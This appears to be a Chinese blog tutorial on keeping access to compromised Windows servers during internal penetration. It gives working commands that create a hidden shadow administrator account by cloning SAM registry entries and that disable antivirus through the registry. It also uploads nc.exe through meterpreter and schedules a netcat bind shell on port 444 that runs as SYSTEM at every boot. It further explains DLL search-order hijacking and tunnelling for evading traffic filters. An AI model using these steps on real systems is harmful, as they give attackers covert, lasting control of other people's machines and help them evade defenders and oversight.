内网渗透之windows权限维持

目录

windows权限维持概述

隐藏技巧

关闭杀软

注册表自启动

 进程劫持

建立隧道


windows权限维持概述

在获取服务器权限后,为了防止服务器管理员发现和修补漏洞而导致对服务器权限的丢失,测试人员往往需要采取一些手段来实现对目标服务器的持久化访问

隐藏技巧

添加影子账户

net user test$ 12345 /add  


net localgroup administrators test$ /add

//使用命令创建隐藏用户并加入管理员组

通过net user 是无法看到用户的

 此时在电脑的账户上面还是可以看到的  

我们按住win+R 输入 regedit 打开 用户注册表 大家看我的路径 然后更改sam的权限 创建影子 重新进一次--------就会出现下面的界面

看自己的administrator 用户 对应的rid 将他复制在影子账户上

 所对应项000003E9导出,分别命名为test.reg和1.reg

导入注册表

net user test$ /del
 
regedit /s test.reg
 
regedit /s 1.reg

将用户的信息 导入注册表 

 这下就完成了真正的影子账户

关闭杀软

还是win+R----regedit  大家看我的路径 然后创建一个DWORD(32位)的文件  输入数据为 1

关闭成功

注册表自启动

利用nc

meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32 
 //上传nc到目标主机

meterpreter > ls nc.exe               
   //查看上传结果及权限

schtasks /create /tn "nc" /ru system /tr "c:\windows\system32\nc.exe -Ldp 444 -e cmd.exe" /sc onstart
         创建     指定名称  执行的用户   指定运行程序的位置                 开启端口号             开机时执行

介绍windows图形化的 大家看图片上面的路径 然后新建字符串 添加自启动软件的路径

 进程劫持

(进程查看器已经放在文章开头)

在Windows下, 几乎每一种文件类型都会关联一个对应的处理程序。

首先DLL会先尝试搜索启动程序所处的目录(1),
没有找到,则搜索被打开文件所在的目录(2),
若还没有找到,则搜索系统目录(3),
若还没有找到,则向下搜索64位系统目录,
…Windows目录…Path环境变量的各个目录。

这样的加载顺序很容易导致一个系统dll被劫持,因为只要攻击者将目标文件和恶意dll放在一起即可,
导致恶意dll先于系统dll加载,而系统dll是非常常见的,所以当时基于这样的加载顺序,出现了大量受影响软件

打开进程查看器 查看pid 到目录下面去查看 更换

 打开搜索框 搜索dll 找到独属于相应的软件dll 然后篡改路径里面的代码 进行你想要进行的操作

(一般都是用c语言编写的)

建立隧道

为什么使用隧道

在数据通信被拦截的情况下利用隧道技术封装改变通信协议进行绕过拦截,CS、MSF无法上线,数据传输不稳定无回显,出口数据被监控,网络通信存在问题等

常见的隧道协议

网络层:IPv6 隧道、ICMP 隧道
传输层:TCP 隧道、UDP 隧道、常规端口转发
应用层:SSH 隧道、HTTP/S 隧道、DNS 隧道

参考这篇文章的链接 
内网常见隧道工具的使用 - FreeBuf网络安全行业门户

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值